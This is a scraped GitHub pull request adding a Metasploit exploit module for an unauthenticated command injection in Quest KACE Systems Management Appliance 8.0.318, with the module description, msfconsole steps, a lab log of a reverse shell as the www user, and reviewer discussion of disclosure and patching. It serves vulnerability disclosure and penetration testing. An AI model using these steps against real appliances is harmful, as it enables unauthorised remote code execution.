Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Quest KACE Systems Management Command Injection #10199

Merged
merged 3 commits into from Jun 26, 2018

Conversation

@bcoles
Copy link
Contributor

bcoles commented Jun 22, 2018

Add Quest KACE Systems Management Command Injection exploit module.

     This module exploits a command injection vulnerability in Quest KACE
     Systems Management Appliance version 8.0.318 (and possibly prior).

     The `download_agent_installer.php` file allows unauthenticated users
     to execute arbitrary commands as the web server user `www`.

     A valid Organization ID is required. The default value is `1`.

     A valid Windows agent version number must also be provided. If file
     sharing is enabled, the agent versions are available within the
     `\\kace.local\client\agent_provisioning\windows_platform` Samba share.
     Additionally, various agent versions are listed on the KACE website.

     This module has been tested successfully on Quest KACE Systems
     Management Appliance K1000 version 8.0 (Build 8.0.318).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/unix/http/quest_kace_systems_management_rce
  • set ORGANIZATION 1
  • set AGENT_VERSION 8.0.152
  • run
  • Verify you get a shell

Scenarios

msf5 > use exploit/unix/http/quest_kace_systems_management_rce 
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.191.192
rhost => 172.16.191.192
msf5 exploit(unix/http/quest_kace_systems_management_rce) > check
[*] 172.16.191.192:80 The target appears to be vulnerable.
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1
ORGANIZATION => 1
set AGENT_VERSION 8.0.152
AGENT_VERSION => 8.0.152
msf5 exploit(unix/http/quest_kace_systems_management_rce) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Sending payload (505 bytes)
[+] Payload executed successfully
[!] Tried to delete /tmp/agentprov/1#;/, unknown result

492648046
kYWSsqpLmmERqEpLazwFOTzulPvsvShY
/kbox/kboxwww/common
EfiuBIzdwhsSLfEpgHrRjbgjszjCkfhf
ZGtYicImqwCnmUNGBZTpqDSPXojYXjkd
jCmxJgLnffuOAlsAFmWygrbOhCWPCNzD
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD k1000 11.0-RELEASE-p12 FreeBSD 11.0-RELEASE-p12 #0: Wed Aug  9 10:03:39 UTC 2017     root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  amd64
^C
Abort session 1? [y/N]  y

[*] 172.16.191.192 - Command shell session 1 closed.  Reason: User exit
@bcoles bcoles added the module label Jun 22, 2018
@bcoles bcoles added the docs label Jun 22, 2018
bcoles added 2 commits Jun 22, 2018
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jun 22, 2018

These issues were reported to the vendor about 4 months ago.

A hotfix for these issues was made public a little over two months ago and subsequently rolled into appliance updates.

hotfix notes

Vulnerability details, including proof-of-concept, have been public for over 3 weeks.

The advisory does not make clear the simplicity with which these issues can be exploited. In particular, the unauthenticated remote command injection vulnerability is easily exploitable, as demonstrated by this module.

This exploit is not fully automated. Knowledge of a valid organization ID and agent version are required. The check method can be used to passively infer the security posture of the appliance by comparing the appliance version against a list of patched versions.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jun 22, 2018

Understood. Thank you.

So I downloaded k1000-ovf_80.zip this morning from the official website, looks like they posted it on Dec 15 2017. Do we have to worry about auto-update when we spin up this appliance? Thanks.

@wvu-r7

This comment has been minimized.

Copy link
Member

wvu-r7 commented Jun 22, 2018

@wchen-r7: You could set networking to host-only unless the update is mandatory.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jun 22, 2018

Gotcha. Thanks!

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jun 23, 2018

I had no issues with auto-updates. I also didn't test the hotfix.

@wchen-r7 wchen-r7 requested review from wchen-r7 and space-r7 Jun 25, 2018
@space-r7 space-r7 merged commit 6d3c141 into rapid7:master Jun 26, 2018
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
space-r7 added a commit that referenced this pull request Jun 26, 2018
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Jun 26, 2018

Release Notes

Add an exploit module that exploits a command injection vulnerability in Quest KACE Systems Management Appliance version 8.0.318.

@wvu-r7

This comment has been minimized.

Copy link
Member

wvu-r7 commented Jun 26, 2018

@space-r7: If you did any repro, please post logs and/or notes here. Thanks!

@bcoles bcoles deleted the bcoles:quest_kace_systems_management_rce branch Jun 26, 2018
msjenkins-r7 added a commit that referenced this pull request Jun 26, 2018
@tdoan-r7 tdoan-r7 added the rn-exploit label Jul 5, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

5 participants
You can’t perform that action at this time.